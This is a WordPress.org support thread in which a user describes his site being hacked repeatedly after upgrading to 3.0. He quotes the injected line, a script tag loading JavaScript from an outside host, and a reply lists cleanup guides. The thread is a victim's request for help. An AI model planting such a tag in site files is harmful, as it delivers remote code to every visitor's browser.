Security problem since updating to 3.0 | WordPress.org

robinhoffmann
(@robinhoffmann)

15 years, 11 months ago
Hi everybody,

since I upgraded to 3.0, my wordpress has obviously been hacked or whatever 3 times now, everytime more or less in the same fashion and I don’t know what the problem is.

I’m not much of an expert in php so I can’t really find out, what causes this trouble and where the leak is.

The problem is that something adds code text to some of my php-files, some of which are even behind a .htaccess (in the wp_admin folder).
It affects index.php, default-widgets.php and all the other “default-*-php files”, as well as all .js file as well as all plugin files (such as wassup’s main.php) as well as pluggable.php

The code added usually looks something like:
```
<script type="text/javascript" src="http://solk.seamscreative.info:8080/Kbps.js"></script>

```
the URL however was different in all 3 events this occured. I fixed it everytime by reuploading all files which I had backuped after the 3.0 upgrade which are clean.

Does anyone have an idea, what I need to look for to prevent this in future or is it a security hole?

All the best
Robin

Viewing 1 replies (of 1 total)

esmi
(@esmi)

15 years, 11 months ago

http://codex.wordpress.org/FAQ_My_site_was_hacked
http://wordpress.org/support/topic/268083#post-1065779
http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
http://ottodestruct.com/blog/2009/hacked-wordpress-backdoors/

Viewing 1 replies (of 1 total)

The topic ‘Security problem since updating to 3.0’ is closed to new replies.

In: Fixing WordPress
1 reply
2 participants
Last reply from: esmi
Last activity: 15 years, 11 months ago
Status: not resolved

Topics

Topics with no replies

Non-support topics

Resolved topics

Unresolved topics

All topics